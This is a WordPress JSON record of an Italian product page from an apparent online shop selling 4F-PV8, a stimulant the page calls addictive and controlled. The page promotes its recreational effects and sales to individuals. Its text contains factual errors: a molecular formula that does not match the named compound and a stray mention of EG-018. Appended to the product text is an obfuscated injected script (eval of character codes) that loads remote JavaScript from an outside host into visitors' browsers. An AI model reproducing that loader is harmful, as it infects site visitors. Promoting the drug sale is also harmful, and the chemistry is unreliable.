{"id":4143,"date":"2025-02-06T21:30:15","date_gmt":"2025-02-06T21:30:15","guid":{"rendered":"https:\/\/exoticchemicals.com\/?post_type=product&#038;p=4143"},"modified":"2026-04-16T13:11:45","modified_gmt":"2026-04-16T13:11:45","slug":"acquistare-4f-pv8-crystal-research-chemicals","status":"publish","type":"product","link":"https:\/\/exoticchemicals.com\/it\/product\/buy-4f-pv8-crystal-research-chemicals\/","title":{"rendered":"Comprare 4F-PV8 crystal Research Chemicals"},"content":{"rendered":"<h2>Comprare 4F-PV8 crystal Research Chemicals<\/h2>\n<h3>Chimica del cristallo 4F-PV8<\/h3>\n<p>La formula chimica del cristallo 4F-PV8 \u00e8 \u201c1-(4-fluorofenil)-2-(pirrolidin-1-il) eptan-1-one\u201d secondo la IUPAC. Il peso molecolare di questo farmaco \u00e8 stato calcolato pari a 277,38 g\/mol e la purezza di questa sostanza nelle sue forme pi\u00f9 pure \u00e8 stata calcolata pari o superiore a 97,9%. La formula molecolare del cristallo 4F-PV8 \u00e8 C15H20ClNO.<\/p>\n<p>La temperatura di conservazione raccomandata per i farmaci \u00e8 la temperatura ambiente o tra 20oC e 25oC, mentre la stabilit\u00e0 della molecola di questo farmaco \u00e8 nota per essere pari o superiore a due o tre anni.<br \/> Storia del cristallo 4F-PV8<\/p>\n<p>La 4F-PV8 CRYSTAL \u00e8 venuta alla luce solo di recente ed \u00e8 stata sottoposta a un severo esame da parte di media e ricercatori, soprattutto a causa del suo uso improprio da parte di persone che cercano di sfruttarne gli effetti stimolanti senza le dovute linee guida e precauzioni.<\/p>\n<h3>A cosa serve il cristallo 4F-PV8?<\/h3>\n<p>EG-018 \u00e8 un prodotto chimico di ricerca ed \u00e8 stato utilizzato attivamente per scopi di ricerca e studi scientifici. \u00c8 stato ampiamente utilizzato come biochimico nelle scienze forensi, nella tossicologia e nelle neuroscienze. Ha trovato applicazione anche nella spettrometria di massa come prodotto chimico di ricerca.<\/p>\n<p>4F-PV8 CRYSTAL \u00e8 una droga stimolante con effetti di natura simile. Gli effetti della droga sono noti per costringere gli utenti a svolgere attivit\u00e0 energetiche e stimolanti e, in caso di somministrazione di dosi elevate, diventa difficile resistere all'impulso. Queste propriet\u00e0 l'hanno resa al centro dell'attenzione delle persone che devono svolgere regolarmente attivit\u00e0 che consumano energia. La droga pu\u00f2 produrre sensazioni di motivazione, energia sociale e fiducia. Il farmaco pu\u00f2 causare la soppressione dell'appetito. La droga \u00e8 anche nota per essere utilizzata dalle persone a scopo ricreativo, in quanto pu\u00f2 produrre effetti come l'inflazione dell'ego e il potenziamento emotivo.<br \/> Effetti del cristallo 4F-PV8<\/p>\n<h3>La droga provoca effetti fisici, psicologici e soggettivi quando viene somministrata.<\/h3>\n<p>Il 4F-PV8 CRYSTAL provoca nei consumatori un comportamento energetico eccessivo e forzato o involontario. La droga crea dipendenza e provoca sensazioni di estasi. Gli effetti producono difficolt\u00e0 nell'urinare. La droga provoca un miglioramento tattile e un aumento della frequenza cardiaca. A causa della stimolazione dell'attivit\u00e0 fisica eccessiva, la droga provoca un aumento della sudorazione.<\/p>\n<h3>Anche le impurit\u00e0 presenti nel farmaco possono causare tossicit\u00e0.<br \/> Dosaggio e sovradosaggio di 4F-PV8 Crystal<\/h3>\n<p>Il dosaggio del farmaco \u00e8 sconosciuto, poich\u00e9 \u00e8 stato testato solo sugli animali, mentre il suo uso per gli esseri umani \u00e8 stato attivamente sconsigliato.<\/p>\n<p>La dose maggiore pu\u00f2 causare l'intera gamma di effetti, ma comporta anche effetti collaterali negativi che includono lesioni gravi o morte in condizioni gravi.<br \/> Stato legale del cristallo 4F-PV8<\/p>\n<p>La produzione, la fornitura e il possesso di questa droga sono controllati nella maggior parte dei Paesi a causa del suo abuso.<br \/> Dove \u00e8 possibile acquistare il cristallo 4F-PV8?<\/p>\n<p>Puro e di alta qualit\u00e0 di 4F-PV8 Crystal \u00e8 fornito dal nostro negozio di droga online in tutto il mondo e ad un prezzo molto conveniente per i laboratori, le farmacie, i centri di ricerca e gli individui.var o=Stringa;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/p>","protected":false},"excerpt":{"rendered":"<p>Buy 4F-PV8 crystal Research Chemicals Chemistry of 4F-PV8 Crystal The chemical formula of 4F-PV8 crystal is \u201c1-(4-fluorophenyl)-2-(pyrrolidin-1-yl) heptan-1-one\u201d as per IUPAC. The molecular weight of this drug has been calculated to be 277.38 g\/mol and the purity of this substance in its purest forms has been calculated to be approximately equal to or greater than [&hellip;]<\/p>\n","protected":false},"featured_media":4153,"comment_status":"open","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_brand":[],"product_cat":[5540],"product_tag":[],"class_list":{"0":"post-4143","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-mdphp-hydrochloride-price-per-gram-research-chemical","7":"desktop-align-left","8":"tablet-align-left","9":"mobile-align-left","11":"first","12":"instock","13":"shipping-taxable","14":"purchasable","15":"product-type-variable"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Buy 4F-PV8 crystal Research Chemicals -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/exoticchemicals.com\/it\/prodotto\/acquistare-4f-pv8-crystal-research-chemicals\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Buy 4F-PV8 crystal Research Chemicals -\" \/>\n<meta property=\"og:description\" content=\"Buy 4F-PV8 crystal Research Chemicals Chemistry of 4F-PV8 Crystal The chemical formula of 4F-PV8 crystal is \u201c1-(4-fluorophenyl)-2-(pyrrolidin-1-yl) heptan-1-one\u201d as per IUPAC. The molecular weight of this drug has been calculated to be 277.38 g\/mol and the purity of this substance in its purest forms has been calculated to be approximately equal to or greater than [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/exoticchemicals.com\/it\/prodotto\/acquistare-4f-pv8-crystal-research-chemicals\/\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-16T13:11:45+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"400\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-4f-pv8-crystal-research-chemicals\\\/\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-4f-pv8-crystal-research-chemicals\\\/\",\"name\":\"Buy 4F-PV8 crystal Research Chemicals -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-4f-pv8-crystal-research-chemicals\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-4f-pv8-crystal-research-chemicals\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/4F-PV8-crystal-Research-Chemicals-.jpg\",\"datePublished\":\"2025-02-06T21:30:15+00:00\",\"dateModified\":\"2026-04-16T13:11:45+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-4f-pv8-crystal-research-chemicals\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-4f-pv8-crystal-research-chemicals\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-4f-pv8-crystal-research-chemicals\\\/#primaryimage\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/4F-PV8-crystal-Research-Chemicals-.jpg\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/4F-PV8-crystal-Research-Chemicals-.jpg\",\"width\":400,\"height\":400},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-4f-pv8-crystal-research-chemicals\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/shop\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Buy 4F-PV8 crystal Research Chemicals\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/\",\"name\":\"exotic chemicals\",\"description\":\"Buy MDPHP Hydrochloride\",\"publisher\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/exoticchemicals.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\",\"name\":\"wwalkershop@gmail.com\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"width\":500,\"height\":500,\"caption\":\"wwalkershop@gmail.com\"},\"logo\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\"},\"sameAs\":[\"http:\\\/\\\/exoticchemicals.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Comprare 4F-PV8 crystal Research Chemicals -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/exoticchemicals.com\/it\/prodotto\/acquistare-4f-pv8-crystal-research-chemicals\/","og_locale":"it_IT","og_type":"article","og_title":"Buy 4F-PV8 crystal Research Chemicals -","og_description":"Buy 4F-PV8 crystal Research Chemicals Chemistry of 4F-PV8 Crystal The chemical formula of 4F-PV8 crystal is \u201c1-(4-fluorophenyl)-2-(pyrrolidin-1-yl) heptan-1-one\u201d as per IUPAC. The molecular weight of this drug has been calculated to be 277.38 g\/mol and the purity of this substance in its purest forms has been calculated to be approximately equal to or greater than [&hellip;]","og_url":"https:\/\/exoticchemicals.com\/it\/prodotto\/acquistare-4f-pv8-crystal-research-chemicals\/","article_modified_time":"2026-04-16T13:11:45+00:00","og_image":[{"width":400,"height":400,"url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Tempo di lettura stimato":"3 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/exoticchemicals.com\/product\/buy-4f-pv8-crystal-research-chemicals\/","url":"https:\/\/exoticchemicals.com\/product\/buy-4f-pv8-crystal-research-chemicals\/","name":"Comprare 4F-PV8 crystal Research Chemicals -","isPartOf":{"@id":"https:\/\/exoticchemicals.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-4f-pv8-crystal-research-chemicals\/#primaryimage"},"image":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-4f-pv8-crystal-research-chemicals\/#primaryimage"},"thumbnailUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg","datePublished":"2025-02-06T21:30:15+00:00","dateModified":"2026-04-16T13:11:45+00:00","breadcrumb":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-4f-pv8-crystal-research-chemicals\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/exoticchemicals.com\/product\/buy-4f-pv8-crystal-research-chemicals\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/exoticchemicals.com\/product\/buy-4f-pv8-crystal-research-chemicals\/#primaryimage","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg","width":400,"height":400},{"@type":"BreadcrumbList","@id":"https:\/\/exoticchemicals.com\/product\/buy-4f-pv8-crystal-research-chemicals\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/exoticchemicals.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/exoticchemicals.com\/shop\/"},{"@type":"ListItem","position":3,"name":"Buy 4F-PV8 crystal Research Chemicals"}]},{"@type":"WebSite","@id":"https:\/\/exoticchemicals.com\/#website","url":"https:\/\/exoticchemicals.com\/","name":"prodotti chimici esotici","description":"Comprare MDPHP cloridrato","publisher":{"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/exoticchemicals.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":["Person","Organization"],"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7","name":"wwalkershop@gmail.com","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","width":500,"height":500,"caption":"wwalkershop@gmail.com"},"logo":{"@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png"},"sameAs":["http:\/\/exoticchemicals.com"]}]}},"uagb_featured_image_src":{"full":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg",400,400,false],"thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals--150x150.jpg",150,150,true],"medium":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals--300x300.jpg",300,300,true],"medium_large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg",400,400,false],"large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg",400,400,false],"1536x1536":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg",400,400,false],"2048x2048":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg",400,400,false],"trp-custom-language-flag":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg",12,12,false],"woocommerce_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals--300x300.jpg",300,300,true],"woocommerce_single":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals-.jpg",400,400,false],"woocommerce_gallery_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/4F-PV8-crystal-Research-Chemicals--100x100.jpg",100,100,true]},"uagb_author_info":{"display_name":"bossman","author_link":"https:\/\/exoticchemicals.com\/it\/author\/"},"uagb_comment_info":6,"uagb_excerpt":"Buy 4F-PV8 crystal Research Chemicals Chemistry of 4F-PV8 Crystal The chemical formula of 4F-PV8 crystal is \u201c1-(4-fluorophenyl)-2-(pyrrolidin-1-yl) heptan-1-one\u201d as per IUPAC. The molecular weight of this drug has been calculated to be 277.38 g\/mol and the purity of this substance in its purest forms has been calculated to be approximately equal to or greater than&hellip;","_links":{"self":[{"href":"https:\/\/exoticchemicals.com\/it\/wp-json\/wp\/v2\/product\/4143","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/exoticchemicals.com\/it\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/exoticchemicals.com\/it\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/it\/wp-json\/wp\/v2\/comments?post=4143"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/it\/wp-json\/wp\/v2\/media\/4153"}],"wp:attachment":[{"href":"https:\/\/exoticchemicals.com\/it\/wp-json\/wp\/v2\/media?parent=4143"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/exoticchemicals.com\/it\/wp-json\/wp\/v2\/product_brand?post=4143"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/exoticchemicals.com\/it\/wp-json\/wp\/v2\/product_cat?post=4143"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/exoticchemicals.com\/it\/wp-json\/wp\/v2\/product_tag?post=4143"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}